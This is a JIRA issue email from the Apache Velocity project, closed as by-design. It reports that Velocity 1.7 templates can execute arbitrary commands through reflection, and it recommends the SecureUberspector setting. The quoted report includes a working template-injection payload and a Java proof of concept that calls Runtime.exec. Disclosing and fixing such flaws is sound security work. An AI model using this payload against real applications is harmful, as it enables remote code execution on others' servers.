[jira] [Closed] (VELOCITY-877) Access to critical fields/methods allows execution of arbitrary code ('Template Injection')

[Sergiu Dumitriu (JIRA)]

     [ 
https://issues.apache.org/jira/browse/VELOCITY-877?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergiu Dumitriu closed VELOCITY-877.
------------------------------------
    Resolution: Not A Problem
      Assignee: Sergiu Dumitriu

Yes, this is by design, **if** you are using the default uberspector. Velocity 
also comes with a secure uberspector, which is designed to prevent exactly this 
kind of security issues.

{noformat}
runtime.introspector.uberspect = 
org.apache.velocity.util.introspection.SecureUberspector
{noformat}

> Access to critical fields/methods allows execution of arbitrary code 
> ('Template Injection')
> -------------------------------------------------------------------------------------------
>
>                 Key: VELOCITY-877
>                 URL: https://issues.apache.org/jira/browse/VELOCITY-877
>             Project: Velocity
>          Issue Type: Bug
>          Components: Engine
>    Affects Versions: 1.7
>            Reporter: Markus Wulftange
>            Assignee: Sergiu Dumitriu
>            Priority: Critical
>              Labels: security
>
> It is possible to reference certain fields/methods, which eventually allow 
> the execution of arbitrary methods.
> For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of 
> any variable, it is possible to get the variable's class object. This can be 
> extended to get arbitrary class objects and execute arbitrary methods.
> For example, the following statement results in the execution of the 
> '{{xterm}}':
> {code}
> $var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
> {code}
> As a standalone:
> {code:java}
> import org.apache.velocity.VelocityContext;
> import org.apache.velocity.app.Velocity;
> import org.apache.velocity.context.Context;
> public class VelocityTest {
>       public static void main(String[] args) {
>               Context context = new VelocityContext();
>               context.put("var", "foo");
>               String instring = 
> "$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
>               Velocity.evaluate(context, null, "templateName", instring);
>       }
> }
> {code}
> This issue has already been made public in the past by James Kettle in August 
> 2015 (see 
> http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity)
>  and via CVE-2015-5603 (see 
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly 
> others.



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@velocity.apache.org
For additional commands, e-mail: dev-h...@velocity.apache.org